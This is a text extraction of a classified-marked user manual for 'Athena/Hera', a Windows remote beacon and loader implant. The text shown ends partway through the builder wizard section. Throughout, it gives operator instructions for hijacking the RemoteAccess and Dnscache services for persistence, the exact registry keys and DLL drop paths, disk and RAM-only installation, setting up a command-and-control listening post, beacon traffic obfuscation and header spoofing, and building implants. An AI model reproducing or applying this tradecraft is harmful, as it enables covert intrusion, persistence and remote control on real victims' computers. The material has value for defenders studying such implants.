Athena V1 0 User Guide
Athena-v1_0-UserGuide
Athena-v1_0-UserGuide
Athena-v1_0-UserGuide
Athena-v1_0-UserGuide
User Manual: Pdf
Open the PDF directly: View PDF .
Page Count: 49
Download | |
Open PDF In Browser | View PDF |
SECRET//NOFORN Engineering Development Group Athena / Hera Version 1.0 User Manual 29 February 2016 Classified By: 2127215 Reason: 1.4(c) Declassify On: 25X1, 20640205 Derived From: CIA NSCG MET S-06 SECRET//NOFORN SECRET//NOFORN ________________________________________________________________________ CHANGE LOG Doc Rev Doc Date Rev By Change Description 11/19/2015 ATI Initial creation SECRET//NOFORN Reference Authority/ Approval Date SECRET//NOFORN ________________________________________________________________________ TABLE OF CONTENTS ATHENA / HERA.........................................................................................................................I VERSION 1.0.................................................................................................................................I USER MANUAL...........................................................................................................................I 1. (U) SCOPE..................................................................................................................................1 2. (U) SYSTEM OVERVIEW.......................................................................................................1 3. (S//NF) ATHENA/HERA CONCEPT OF OPERATION (CONOP)....................................2 3.1 (U) SUMMARY OF CAPABILITIES............................................................................................3 4. (S//NF) SYSTEM VERSIONS..................................................................................................3 4.1 (S//NF) ATHENA.....................................................................................................................3 4.2 (S//NF) HERA.........................................................................................................................4 4.3 (S//NF) ATHENA/HERA VERSION COMPARISON....................................................................5 5. (U) LISTENING POST.............................................................................................................5 5.1 (U) INSTALLATION.................................................................................................................6 5.2 (U) CONFIGURATION..............................................................................................................9 5.3 (U) MANAGEMENT...............................................................................................................10 6. (U) BUILDER..........................................................................................................................11 6.1 (U) USAGE............................................................................................................................11 6.2 (U) COMMAND LINE OPTIONS.............................................................................................12 6.3 (U) WIZARD........................................................................................................................13 6.4 (U) CONFIGURATION............................................................................................................15 6.5 (U) OUTPUT..........................................................................................................................19 7. (U) IMPLANT INSTALLATION..........................................................................................23 7.1 (U) OVERT INSTALLATION ON DISK MODE.........................................................................23 7.2 (U) RANDOM ACCESS MEMORY-ONLY (RAM-ONLY) MODE.............................................23 7.3 (U) IMPLANT OFFLINE INSTALLATION................................................................................23 8. (U) TASKER............................................................................................................................25 8.1 (U) USAGE............................................................................................................................26 8.2 (U) COMMAND LINE OPTIONS.............................................................................................26 8.3 (U) USER INTERFACE...........................................................................................................28 8.4 (U) USER INTERFACE EXAMPLE..........................................................................................34 8.5 (U) OUTPUT..........................................................................................................................36 SECRET//NOFORN i SECRET//NOFORN ________________________________________________________________________ 9. (U) PARSER.............................................................................................................................36 9.1 (U) USAGE............................................................................................................................37 9.2 (U) COMMAND LINE OPTIONS.............................................................................................37 9.3 (U) PROCESSING RESPONSES AND SAFETIES........................................................................38 9.4 (U) OUTPUT..........................................................................................................................38 9.5 (S//NF) ERROR CODES........................................................................................................41 10. (U) NOTES AND OBSERVATIONS...................................................................................42 10.1 (U) INSTALLATIONS OF HERA REQUIRE A REBOOT FOR ELEVATED ACCESS PRIVILEGES 42 10.2 (U) INSTALLER AND RAM_ONLY VERSIONS SHOULD NEVER BE RUN FROM DISK.......42 10.3 (U) BUILDER DOES NOT PRODUCE A “BIT COPY” OF AN EXISTING CONFIGURED IMPLANT ....................................................................................................................................................42 10.4 (U) OFFLINE INSTALLER MAY REPORT A FALSE FAILURE ON WINDOWS 10 INSTALLATIONS..........................................................................................................................42 10.5 (S//NF)TIMEOUTS MAY OCCUR WHILE PROCESSING LARGE FILES..................................42 11. (U) ACRONYMS / ABBREVIATIONS...............................................................................43 LIST OF FIGURES FIGURE 1 – (S//NF) ATHENA/HERA CONCEPT OF OPERATION...................................2 FIGURE 2 - (S//NF) LISTENING POST DIRECTORY HIERARCHY.................................6 FIGURE 3 - (S//NF) UBUNTU REPOSITORY LISTING EXAMPLE...................................6 FIGURE 4 - (S//NF) OPTIONAL SSL CERTIFICATE CREATION.....................................6 FIGURE 5 - (S//NF) FAILED SETUP.PY SCRIPT OUTPUT.................................................7 FIGURE 6 - (S//NF) PIP OUTPUT FOR MANUAL BOTTLE INSTALL..............................7 FIGURE 7 - (S//NF) COMPLETING SETUP.PY SCRIPT OUTPUT.....................................8 FIGURE 8 - (S//NF) LISTENING POST CONFIGURATION FILE......................................9 FIGURE 9 - (S//NF) BUILDER COMMAND LINE OPTIONS.............................................12 FIGURE 10 - (S//NF) SYSTEM BINARY PATH.....................................................................13 FIGURE 11 - (S//NF) BUILDER WIZARD REVIEW............................................................15 FIGURE 12 - (S//NF) EXAMPLE RECEIPT FILE - XML....................................................22 FIGURE 13 - (S//NF) BUILDER OUTPUT FILES..................................................................22 FIGURE 14 - (S//NF) WINDOWS OFFLINE INSTALLER...................................................24 FIGURE 15 - (S//NF) LINUX OFFLINE INSTALLATION...................................................25 FIGURE 16 - (S//NF) TASKER COMMAND LINE OPTIONS.............................................26 SECRET//NOFORN ii SECRET//NOFORN ________________________________________________________________________ FIGURE 17 - (S//NF) TASKER MAIN MENU........................................................................28 FIGURE 18 - (S//NF) TASKER SHELL INTERFACE EXAMPLE – PART 1....................35 FIGURE 19 - (S//NF) TASKER SHELL INTERFACE EXAMPLE – PART 2....................35 FIGURE 20 - (S//NF) PARSER COMMAND LINE OPTIONS.............................................37 SECRET//NOFORN iii SECRET//NOFORN ________________________________________________________________________ LIST OF TABLES TABLE 1 - (U) APPLICABLE DOCUMENTS..........................................................................1 TABLE 1 - (U) APPLICABLE DOCUMENTS..........................................................................1 TABLE 2 - (S//NF) ATHENA SYSTEM COMPONENTS........................................................1 TABLE 2 - (S//NF) ATHENA SYSTEM COMPONENTS........................................................1 TABLE 3 - (U) INSTALLED FILE AND REGISTRY RESOURCES.....................................3 TABLE 4 - (U) INSTALLED FILE AND REGISTRY RESOURCES.....................................4 TABLE 5 - (S//NF) DIFFERENCES BETWEEN VERSIONS.................................................5 TABLE 6 - (S//NF) SIMILARITIES BETWEEN VERSIONS.................................................5 TABLE 7 - (S//NF) STEP-BY-STEP IMPLANT CONFIGURATION INSTRUCTIONS...15 TABLE 8 - (S//NF) REQUIRED OFFLINE INSTALLER COMPONENTS........................25 TABLE 9 – (U) COMMAND FILE ENCODING.....................................................................36 TABLE 10 - (U) ERROR CODES..............................................................................................41 TABLE 11 - (U) ACRONYMS AND ABBREVIATIONS.......................................................43 SECRET//NOFORN iv SECRET//NOFORN ________________________________________________________________________ 1. (U) Scope (U) This document establishes the User Guide for Athena v1.0 and for Hera v1.0. See Section 4 for a discussion of the specific characteristics of each system. Table 1 - (U) Applicable Documents Description Athena v1.0 User Requirement Document – OPS0001051 Hera v1.0 User Requirement Document – OPS0001743 Athena v1.0 IV&V Report Date Version 3-Feb-2016 REV G 15-Feb-2016 REV B TBS TBS 2. (U) System Overview (S//NF) The Athena System fulfills COG/NOD's need for a remote beacon/loader. Table 2 shows the system components available in Athena/Hera v1.0. The target computer operating systems are Windows XP Pro SP3 32-bit (Athena only), Windows 7 32-bit/64-bit, Windows 8.1 32bit/64-bit, Windows 2008 Enterprise Server, Windows 2012 Server, and Windows 10. Ubuntu v14.04 is the validated Linux version. Apache 2.4 is the validated web server for the Listening Post. Table 2 - (S//NF) Athena System Components Component / Application Builder Tasker Parser Listening Post Installer RamOnly OffLine Function Provides the ability to build packages for specified targets. (e.g. installers, offline scripts, ram-only modules and receipts) Provides the ability to task a specific implant. (e.g. get, put, set, memload, memunload, delete and uninstall) Provides the ability to decode responses from the target. Provides interaction with the remote target. All batch tasking files are copied to this server for processing. Installs the tool onto the target system (DLL file) Execute a diskless version of the implant as a DLL on the target system (DLL file) Install the tool onto the target system with physical access using Linux Boot or Windows Recovery Console. Operating System Language Used Linux / Windows Python 3.4 Linux / Windows Python 3.4 Linux / Windows Python 3.4 Linux(Apache) Python 3.4 Windows x86/x64 C++ Windows x86/x64 C++ Linux / Windows x86/x64 bash/C++ SECRET//NOFORN 1 SECRET//NOFORN ________________________________________________________________________ 3. (S//NF) Athena/Hera Concept of Operation (CONOP) Figure 1 – (S//NF) Athena/Hera Concept of Operation (S//NF) Figure 1 depicts the Athena Concept of Operation. The Athena/Hera system consists of a Builder, Tasker, Parser, Listening Post, Installer, ramonly and offline capabilities. (S//NF) The operator uses the Builder (builder.py) to tailor an implant for the specific operational scenario. The operator then deploys the configured implant (Installer) on a target computer. (S//NF) Once activated, the Installer will modify the target registry and drop the host file (IprCache.dll default) and data file (ras.cache default) in their specified locations. The installation tool will restart the RemoteAccess service and launch the Athena Engine in the netsvcs svchost.exe process. The installed tool will beacon to the Listening Post (LP) to receive tasking. (S//NF) The system also allows the Operator to configure certain behavior of the tool at runtime during beacon events. The Tasker (tasker.py) is used to task the implant. The Parser (parser.py) is used to decode the results retrieved from the Listening Post. Note (S//NF) The Installer must be executed as an Administrator or any other user account with permissions to start/stop services, modify the registry and write to the system32 directory/subdirectories. SECRET//NOFORN 2 SECRET//NOFORN ________________________________________________________________________ 3.1 (U) Summary of Capabilities (S//NF) The following is a summary of the system capabilities: • Executes on the Windows XP (SP3)/7/8.1/2008/2012/10 (x86/x64) operating systems. • Provides a beaconing capability that provides configuration and task handling • Provides memory loading/unloading of NOD Persistence Specification DLLs on the target system • Provides delivery and retrieval of files to/from a specified directory on the target system • Allows the operator to configure settings during runtime (while the implant is on target) 4. (S//NF) System Versions (S//NF) The system was designed to allow a base installation (Athena) and an extended installation (Hera). Both versions contain the full command set defined in this document. This section will describe the differences between the implementations and configurations. 4.1 (S//NF) Athena (S//NF) Athena is the primary implementation for use on WinXP through Win10 operating systems. This implementation uses the RemoteAccess service for persistence, ZLIB for compression and XTEA for encryption on disk. 4.1.1 ((S//NF) On-Target Footprint (S//NF) The Athena implant is compliant with the NOD Persistence Specification for persistent DLLs and provides its own persistence mechanism. Athena will be hosted by the RemoteAccess service. There is an external DLL that this service will load that is not a service DLL. Table 3 - (U) Installed File and Registry Resources File System Modification Location Configuration Item Description %SystemRoot%\\System32\\ Microsoft\\Crypto\\RAS\\iprcache.dll TARGET_FILENAME The overt target file location on disk that is referenced by the RemoteAccess service. %SystemRoot%\\System32\\ CodeIntegrity\\ras.cache DATA_FILENAME The overt data file location on disk that contains the package file (config, engine, etc.). SYSTEM\\CurrentControlSet\\Services\\ RemoteAccess\RouterManagers\\IP Start = 2 Type = 20 SYSTEM\\CurrentControlSet\\Services\\ RasMan Start = 2 Type = 20 SYSTEM\\CurrentControlSet\\Services\\ SStpSvc Start = 2 Type = 20 SYSTEM\\CurrentControlSet\\services\\RemoteAccess\\ RouterManagers\\Ip DLLPath= %SystemRoot%\\System32\\iprtrmgr.dll DLLPath This overt registry entry forces the RemoteAccess service to load the target DLL before loading the true support DLL. None This overt registry entry is updated to allow this dependent service to start when the RemoteAccess service starts. None This overt registry entry is updated to allow this dependent service to start when the RemoteAccess service starts. None (Windows10 Only) Used by RemoteAccess Service SECRET//NOFORN 3 SECRET//NOFORN ________________________________________________________________________ File System Modification Location Configuration Item Description SYSTEM\\CurrentControlSet\\services\\RemoteAccess\\ RouterManagers\\Ip GlobalInfo=SYSTEM\\CurrentControlSet\\services\\RemoteAccess\\ RouterManagers\\Ip ProtocolId= 0x00000021 None (Windows10 Only) Used by RemoteAccess Service None (Windows10 Only) Used by RemoteAccess Service 4.2 (S//NF) Hera (S//NF) Hera is a secondary implementation for Windows 8 through Windows 10. The output receipt file will contain a special key 1 in the XML file. This implementation uses the Dnscache service for persistence, BZIP2 for compression and AES 256 for encryption on disk. 4.2.1 ((S//NF) On-Target Footprint (S//NF) The Hera implant is compliant with the NOD Persistence Specification for persistent DLLs and provides its own persistence mechanism. Hera will be hosted by the DNSClient service. There is an external DLL that this service will load that is not a service DLL. Table 4 - (U) Installed File and Registry Resources File System Modification Location Configuration Item Description %SystemRoot%\\System32\\ Microsoft\\Crypto\\DNS\\dnscache.dll TARGET_FILENAME The overt target file location on disk that is referenced by the Dnscache service. %SystemRoot%\\System32\\ CodeIntegrity\\dns.cache DATA_FILENAME The overt data file location on disk that contains the package file (config, engine, etc.). SYSTEM\CurrentControlSet\Services\ Dnscache Start = 2 Type = 20 Parameters\extension This overt registry entry forces the Dnscache service to load the target DLL before loading the true support DLL. SYSTEM\CurrentControlSet\Services\ Dnscache ImagePath %SystemRoot%\system32\svchost.exe -k netsvcs SYSTEM\CurrentControlSet\Services\ Dnscache ObjectName LocalSystem HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows NT\CurrentVersion\Svchost Netsvcs Ensure that the dnscache service is included on the list of netsvcs. 4.2.2 (U) Installation Notes (S//NF) The installation will hijack the Dnscache service. On Windows 7 and 8, this service is running in a netsvcs instance by default but on Windows 8.1 and Windows 10, this service runs as NetworkService. The NetworkService user context has reduced security capability on the system. Due to the srvhost implementation, the service will only run in the netsvcs context at next reboot. To account for this deficiency and still provide immediate execution after installation, the existing service will run as NetworkService until next reboot at which time the System user netsvcs will be engaged. SECRET//NOFORN 4 SECRET//NOFORN ________________________________________________________________________ 4.3 (S//NF) Athena/Hera Version Comparison Table 5 - (S//NF) Differences between Versions Feature Athena Hera Hash (function names) Mask(local encryption) Packing Mask String Mask Compilation Module Compilation (actual modules using alternate compilation) Adler hash – from zlib XTEA with key increment 0x3B 0x5D8E1792 MSVC 2013 Installer.dll Host.dll Ram_only.dll RemoteAccess ZLIB Superfast hash AES with reduced key space 0x5C 0xAF27D2C9 LLVM 3.7.0 Installer.bravo.dll Host.bravo.dll Ram_only.bravo.dll Dnscache BZip2 Persistence Compression Table 6 - (S//NF) Similarities between Versions Feature Commonality Data file Business Logic File format and content is the same but the masking is different The command module uses different masking but the code is compiled with MSVC and will look similar. This module is dynamically loaded. The engine module has mostly the same code between the two modules and is complied with MSVC and will look similar. This module is dynamically loaded. The uninstall module will be almost identical between versions. This module is dynamically loaded. The import tables between (Installer/host/ram_only) will be similar. Additional unused imports have been included in the Hera version. The communications between the versions has not changed (i.e., RSA with a generated session AES 256 key) The state file logic is the same and the stored files may have similar information but will be masked differently on disk. No function abstractions have been incorporated between the versions. Functionally, these two versions should produce virtually the same function call list. Engine Uninstall Imports Communications State File Logic Function Ordering 5. (U) Listening Post (S//NF) The Listening Post (LP) uses a Bottle Python Web Framework WSGI interface to simplify the Listening Post interface between the targets and the server. The tasker.py tool generates encrypted tasking that is placed on the Listening Post for distribution to client targets. The targets respond with an encrypted file that can be decrypted with the parser.py tool. (S//NF) The Listening Post was designed to function as a simple file server to deliver tasking to the target. The LP server was designed to run with Apache Server (2.4) running on Ubuntu v14.04. Tasking files generated by the Tasker are placed into user configured directories generated by the server setup script. The target will beacon into the LP for tasking and the LP will respond by parsing client directories and sending back data from the corresponding directory. The directory is organized in a single parent folder to multiple child folders specified by the implant’s 4 character identifier. The directory hierarchy is laid out as follows: SECRET//NOFORN 5 SECRET//NOFORN ________________________________________________________________________ ROOT folder |---- server log files |---- Parent ID folder (e.g., TEST) | |---- parent tasking files | |---- Child ID folder | | |-- inbox folder (files received from the implant) | | |- Responses and safety files | | |-- outbox folder (files to be sent to the implant) | | |- tasking files | |---- Child ID folder | … |---- Parent ID folder … Figure 2 - (S//NF) Listening Post Directory Hierarchy 5.1 (U) Installation (S//NF) The Listening Post server setup is performed by the setup.py script. The python script setup.py should be run on Ubuntu v14.04. The setup script will install all required files automatically if an Ubuntu repository can be reached. The following is a list of required packages: • • • • • Apache 2.4 Apache mod_wsgi module Python 3.4 Python pip (only used to retrieve bottle) Python bottle web framework (S//NF) Validate that the current Ubuntu instance has the correct repository location. This can be validated by viewing the source.list file. > /etc/apt/sources.list deb deb deb deb http://repo.devlan.net/ubuntu http://repo.devlan.net/ubuntu http://repo.devlan.net/ubuntu http://repo.devlan.net/ubuntu trusty main universe multiverse restricted trusty-security main universe multiverse restricted trusty-updates main universe multiverse restricted trusty-backports main universe multiverse restricted Figure 3 - (S//NF) Ubuntu Repository Listing Example (S//NF) The SSL component of the install requires a valid SSL certificate. By selection NO to the option “use pre-existing SSL certificate and key”, will generate a new certificate for you. OpenSSL can also be used to generate a certificate. The follow example shows how this can be done. > > > > openssl genpkey -algorithm RSA -out a.key openssl req -new -key a.key -out a.req -subj /CN=1.1.1.1 openssl x509 -req -in a.req -signkey a.key -out a.cert sudo apt-get update Figure 4 - (S//NF) Optional SSL Certificate Creation (S//NF) To run the installation tool from the current Ubuntu instance, copy the Listening Post directory from the installation disk to the Ubuntu v14.04 instance. The Ubuntu v14.04 Linux distribution already contains Python 3.4 pre-installed. Use the provided installation script to complete the installation. SECRET//NOFORN 6 SECRET//NOFORN ________________________________________________________________________ > sudo python3 setup.py -install ~/Desktop/listeningpost$ sudo python3 setup.py -install Verifying packages are installed ... Apache is not installed. Do you want to install? (Y/N) default: Y Installing Apache... Mod-wsgi is not installed. Do you want to install? (Y/N) default: Y Installing Mod-wsgi... Python-pip is not installed. Do you want to install? (Y/N) default: Y Installing pip3... Python Bottle is not installed. Do you want to install? (Y/N) default: Y Installing Bottle... Failed installed. Try manual install. One or more install packages did not exist or failed. Continue? (Y/N) default: N y Copying files to /var/www/html Server configuration file options: Enter full path to tasking directory, i.e. /var/www/html/data: Server configuration file options: Enter full path to tasking directory, i.e. /var/www/html/data: ^CTraceback (most recent call last): File "setup.py", line 315, ininstall() File "setup.py", line 42, in install write_config() File "setup.py", line 132, in write_config root_dir = input("Enter full path to tasking directory, i.e. {}/data: ".format(www_dir)) Figure 5 - (S//NF) Failed setup.py Script Output (S//NF) Should the install script fail to find bottle, the Operator must install bottle manually. This condition can occur if a pip server cannot be found or if bottle is not installed on the pip server. To support this situation, bottle has been included on the Listening Post distribution disk. Use the following command to install bottle manually: sudo pip3 install bottle/bottle-0.12.8.tar.gz > sudo pip3 install bottle/bottle-0.12.8.tar.gz Unpacking ./bottle-0.12.8.tar.gz Running setup.py (path:/tmp/pip-0C2Zam-build/setup.py) egg_info for package from file:///home/xxx/Desktop/listeningpost/bottle/bottle-0.12.8.tar.gz Installing collected packages: bottle Running setup.py install for bottle changing mode of build/scripts-2.7/bottle.py from 644 to 755 changing mode of /usr/local/bin/bottle.py to 755 Successfully installed bottle Cleaning up... Figure 6 - (S//NF) pip Output for Manual Bottle Install (S//NF) If the installation did not complete, it can be restarted to complete the installation. > python3 setup.py -install Verifying packages are installed ... Copying files to /var/www/html Server configuration file options: Enter full path to tasking directory, i.e. /var/www/html/data: Nothing was entered, using /var/www/html/data /var/www/html/data does not exists, creating. Enter name of inbound folder: IN SECRET//NOFORN 7 SECRET//NOFORN ________________________________________________________________________ Enter name of outbound folder: OUT Enter URL path of tasking resources (comma separated), i.e. /blog/comments, /php/id: / Enter URL path of web resources (comma separated), i.e. /, /web: /html Enabling mod-wsgi Disabling default site. Use pre-existing SSL certificate and key? (Y/N) default: N Generating a 2048 bit RSA private key ......................+++ ..+++ writing new private key to 'fileserver.key' ----You are about to be asked to enter information that will be incorporated into your certificate request. What you are about to enter is what is called a Distinguished Name or a DN. There are quite a few fields but you can leave some blank For some fields there will be a default value, If you enter '.', the field will be left blank. ----Country Name (2 letter code) [AU]: State or Province Name (full name) [Some-State]: Locality Name (eg, city) []: Organization Name (eg, company) [Internet Widgits Pty Ltd]: Organizational Unit Name (eg, section) []: Common Name (e.g. server FQDN or YOUR name) []: Email Address []: Moving cert to /etc/ssl/certs/fileserver.crt Moving key to /etc/ssl/private/fileserver.key Enabling SSL site 001-default-ssl.conf Disabling port 80. Restarting services... Install done. Figure 7 - (S//NF) Completing setup.py Script Output (S//NF) After installing the required packages, the setup script will modify Apache to enable SSL on port 443 and generate any required SSL keys and certificate if not supplied. In addition, the setup script will ask to setup the directories where the tasking files will reside. (S//NF) After installation is complete, make sure to check that the file/folder exists, proper permissions have been applied, and Apache is successfully running on port 443. The setup script expects a default installation of Apache 2.4. If any configuration files have been modified, the setup script may not work correctly. You may have to manually modify the /etc/apache2/sitesavailable/001-default-ssl.conf to point to the correct location of your SSL keys and certs. In addition, add the following line under DocumentRoot, to enable WSGI: WSGIScriptAlias / /var/www/html/app.wsgi (S//NF) The directory /var/www/html should contain three files; app.wsgi, server.py, and config.json. To disable port 80, edit /etc/apache2/ports.conf and comment out the line with "Listen 80". (U) Some common Apache commands are listed below: sudo a2enmod - to enable a module, i.e. sudo a2enmod wsgi sudo a2dissite - to disable a site configuration sudo a2ensite - to enable a site configuration sudo service apache2 restart - restart Apache sudo service apache2 start sudo service apache2 stop tail –f /var/log/apache2/access.log SECRET//NOFORN 8 SECRET//NOFORN ________________________________________________________________________ 5.2 (U) Configuration (S//NF) The Listening Post instance can be configured with a local JSON encoded text file called “config.json”. The setup script will write out a configuration file, config.json, as well as copy the corresponding required Server python files to /var/www/html. The config.json file contains the information generated by the setup script and is read by the Server python script on start-up. The config.json can be edited manually to add/modify/delete any user updates, if edits are made the Apache server should be restarted to insure everything is refreshed. The config.json contains, { "DATA_URLS": ["/blog/comm", "/php/id", "/"], "ROOT_DIR": "/srv/athena", "WEB_URLS": ["/html", "/", "/web"], "OUT_FOLDER": "OUT", "IN_FOLDER": "IN", "HOST" : "0.0.0.0", "PORT" : "", "LOG_SIZE" : "65536", "HTTP_ERROR_CODE" : 200 } Figure 8 - (S//NF) Listening Post Configuration File Warning (S//NF) The values in DATA_URLS must contain the value configured in the Implant Builder field, Beacon URL Path for LP. The values in WEB_URLS must contain the value configured in the LP Builder field, URL Path for Web Resources. 1) DATA_URLS – This is the virtual URL path sent from the target to inform Apache to forward requests to the Athena Listening Post. 2) ROOT_DIR - This is the root directory location where the parent folder must be created with the 4 character identifier configured for the target. 3) WEB_URLS – This value defines the URL path of web resource. This can be any URL path that you plan on delivering normal web content (must not be the same as tasking URL path) 4) DATA_URLS - Tasking directory - this is the root directory location where the parent folder must be created with the 4 character identifier configured for the target. 5) OUT_FOLDER - This folder contains the tasking files generated by the Tasker that will be sent to the target for processing. 6) IN_FOLDER - This folder contains the files that the target will upload back to the LP for post-processing by the Parser. 7) HOST – This is the NIC binding address. (default 0.0.0.0) 8) PORT – This value defines the web port. (default 443) 9) LOG_SIZE – This value defines the size of a single log file. (default 64K) By setting this value to zero, no logging information will be stored. The server will store at most 5 backup logs in the current instance. 10) HTTP_ERROR_CODE – This value defines the error code returned to the target when an error occurs. It is the responsibility of the system administrator to validate alternate return codes to support forwarding or other capabilities. HTTP Status codes for failure: a) b) c) d) 407 - proxy authentication failed 502, 504 - proxy or gateway failure 600, 601, 602, 603 - squid error codes All other status codes indicates successful beacon. SECRET//NOFORN 9 SECRET//NOFORN ________________________________________________________________________ Note (U) URLs should start with a slash ("/") but should not have an ending slash. 5.3 (U) Management (S//NF) To specify initial tasking for a target (i.e., when the target first beacons to the LP), create a folder on the LP with the parent ID. Place any generic tasking created for the family of targets in this parent folder. When a new target beacons, the LP creates a child folder for the specific child ID and copies the parent tasking into the child folder. The LP only copies the parent tasking to the child folder once -- when the child folder is initially created. On subsequent beacons, all tasking will be pulled directly from the child folder. The Operator must manually copy the target’s specific tasking from the Tasker to the target’s OUT directory as well as move files from the target’s IN directory for processing by the Parser tool. (S//NF) If there is both parent and child tasking for a target, it will be processed in the following order, based on the user-configured priority: 1. Child tasking a. Non-persistent b. Persistent 2. Parent tasking a. Non-persistent b. Persistent Note (S//NF) All child-specific tasking will take precedence over any existing parent tasking. 5.3.1 (U) URL Query: (S//NF) To obfuscate the URL request and prevent caching, each request from the target will append a template with random data to each request. The following strings define the templates for processing URL queries. ?keyword=%s&matchtype=p ?ping?clientid=%s ?event?a=%sy=false ?h.key=%s ?activityi;src=%s 5.3.2 (U) Request Headers (S//NF) The request header will include user configured headers as well as default ones. User Agent: (user-configured) Accept: (user-configured) Accept-Language: (user-configured) Accept-Encoding: (user-configured) SECRET//NOFORN 10 SECRET//NOFORN ________________________________________________________________________ Host: (user-configured domain beacon names) Connection: keep-alive (default) Cache-Control: private, no-cache, no-store, max-age=0\r\n (default) Cookie: session-id= (default parent ID and generated child ID masked with a generated key) 5.3.3 (U) Data Formating (S//NF) Before being sent back to the LP, the data undergoes the following transformations: • • • • • • Data hash is computed using zlib adler32 Data is zlib compressed Data is RSA encrypted Data hash is appended to the data Data signed digest is appended to the data Masked parent and child ID are appended to the data 5.3.4 (U) Communications Settings (S//NF) The connection logic to the LP takes into account the user configured proxy, IE proxy, WPAP proxy, and direct connection. The CommMod will save and send back to the LP any proxy information that was found for later use. The CommMod will use the connection settings in the following order: 1. User configured Proxy settings 2. Direct Connection 3. IE previously saved Proxy settings 4. WPAD previously saved Proxy settings 5. Try the IE Proxy. If it is a new proxy setting then it will be saved for future use and sent back to the LP. 6. Try the WPAD Proxy. If it is a new proxy setting then it will be saved for future use and sent back to the LP. 6. (U) Builder (S//NF) Some general usage comments are presented below: • Any default value (e.g., [bracketed text]) is either randomly generated or a suggestion, and their use on multiple operations without modification may present a signature that could identify the presence of Athena in a network. • The word 'overt' in a prompt for configuration information indicates the information will be visible to a user logged on to the target machine. Care should be taken to ensure these values are consistent with the operational CONOP. • Configuration settings that can be modified when the implant is on target are indicated in the prompt text. 6.1 (U) Usage (S//NF) This section contains information for configuring an implant. Figure 9 below shows the command line options for the Builder. SECRET//NOFORN 11 SECRET//NOFORN ________________________________________________________________________ Warning (S//NF) Implant configuration may be completed on the lowside; however, the operator should be aware that cryptographic key data will be in the clear. (S//NF) By default, the Builder will walk the operator through the process of configuring an implant (via the wizard) that will be deployed to a target computer. Alternatively, the operator can also input all configuration values via command line arguments in order to build an implant with a single command. Builder usage: builder.py [-h] [-i SYSTEM_BINARY_PATH] [-r SYSTEM_IMPORT_XML] [-o SYSTEM_EXPORT_PATH] [-w] [-b] [--debug] Builder Configuration optional arguments: -h, --help show this help message and exit -i SYSTEM_BINARY_PATH, --input SYSTEM_BINARY_PATH This argument provides the location of the raw binary data files. (NOTE: .\bin is the default path). -r SYSTEM_IMPORT_XML, --receipt SYSTEM_IMPORT_XML This argument defines an existing receipt filename to be used for default values. -o SYSTEM_EXPORT_PATH, --output SYSTEM_EXPORT_PATH This argument provides the output directory path to store the target files (NOTE: .\builder_output is the default path). -w, --wizard This argument will request information from the user via the wizard. -b, --bravo This argument builds the Athena BRAVO implementation. --debug This argument allows debugging information to be included in the output directory. Figure 9 - (S//NF) Builder Command Line Options 6.2 (U) Command Line Options The builder.py script has multiple command line options. For most users, no command line options are required. The local directory will be used to output results. Usage: python.exe builder.py 6.2.1 (U) System Binary Path (S//NF) This argument provides the location of the raw binary data files. The default location is in the current directory in the BIN folder. Figure 10 (below) shows the files that must reside in the system binary path. SECRET//NOFORN 12 SECRET//NOFORN ________________________________________________________________________ BIN ├───offline │ functions.sh │ linux.sh │ reged.static │ target_x64.ini │ target_x86.ini ├───x64 │ command.axe │ engine.axe │ host.dll │ install.dll │ offline.exe │ ram_only.dll │ uninstall.axe └───x86 command.axe engine.axe host.dll install.dll offline.exe ram_only.dll uninstall.axe - linux offline files - 64 bit implant components - 32 bit implant components Figure 10 - (S//NF) System Binary Path 6.2.2 (U) System Import XML (S//NF) This argument provides the location of the existing receipt file to be used for configuration information. This option is used to input specific information into this build (e.g. use this option to create an exact copy of an existing build). 6.2.3 (U) System Export Path (S//NF) This argument provides the output directory path to store the target files. By default, the .\builder_output path is the location for the output. A sub-directory called RECEIPTS is created in this directory to contain all receipts created by this installation. This simplifies parsing by having all receipts in a single location. When creating implants for a group of targets, the parent name will be in the output directory (e.g. .\builder_output\test). If a build is generated for a specific child, the child name will be incorporated into the name of the output directory (e.g. .\builder_output\test_ABCD0086). 6.2.4 (U) Debug (S//NF) This argument allows debugging information to be included in the output directory. When this option is selected, an additional debug directory is included in the output. This contains all intermediary files required by the Builder and can be used to support debugging. 6.3 (U) Wizard (S//NF) The following (Figure 11) shows an example of using the wizard option of the Builder in order to configure and build an implant. Select the default value by using ENTER key. $ python.exe builder.py Builder Generating client RSA key pair Generating server RSA key pair Athena Wizard: This wizard will guide you through the input options for the Athena tool. Press enter to accept default value. SECRET//NOFORN 13 SECRET//NOFORN ________________________________________________________________________ Target - Parent ID (4 chars) default:[RnzI] new value: Target - Child ID (number - dword) default:[] new value: Target - dynamic data config type (internal,file,registry) default:[internal] new value: Beacon - Interval in seconds (number) default:[86400] new value: Beacon - Jitter as a percentage of Interval 0..100 (number) default:[5] new value: Beacon - Boot Delay in seconds (number) default:[60] new value: Beacon - Hibernation Delay in seconds (number) default:[60] new value: Beacon - Tasking Delay in seconds (number) default:[60] new value: Beacon - Domains (LP Server DNS hostname or IP Addresses separated by a comma) default:[None] new value: abc.com Beacon - Port (number) default:[443] new value: Beacon - Proxy Port NOTE:0=disable (number) default:[0] new value: Beacon - User Agent String (string) default:[Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0)] new value: Beacon - URL Path for LP (string) default:[/] new value: Beacon - Accept Header (string) default:[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] new value: Beacon - Accept Language Header (string) default:[en-US,en;q=0.5] new value: Beacon - Accept Encoding Header (string) default:[application/octet-stream] new value: Beacon - IE Proxy Address (string) default:[] new value: Beacon - WPAD Proxy Address (string) default:[] SECRET//NOFORN 14 SECRET//NOFORN ________________________________________________________________________ new value: Tasking - Overt State File Path (string) default:[] new value: Tasking - Batch Execution Timeout in seconds (number) default:[0] new value: Tasking - Command Execution Timeout in seconds (number) default:[0] new value: Tasking - Chunk Size - maximum number of bytes in a single block (number) default:[0] new value: Tasking - Max CPU Utilization 0..100 (number) default:[0] new value: Tasking - Max Processing Data Size (number) default:[50331648] new value: Uninstall - Date (YYYY-MM-DDTHH:MM:SS) - UTC default:[] new value: Uninstall - Deadman Delay in seconds (number) default:[0] new value: Uninstall - Beacon failure attempts (number) default:[0] new value: Uninstall - Kill File Path - full file path on target (string) default:[] new value: Install - Target File Name (string) default:[%SystemRoot%\System32\Microsoft\Crypto\RAS\iprcache.dll] new value: Install - Data File Name (string) default:[%SystemRoot%\System32\CodeIntegrity\ras.cache] new value: Install - Restart service with Service Control Manager 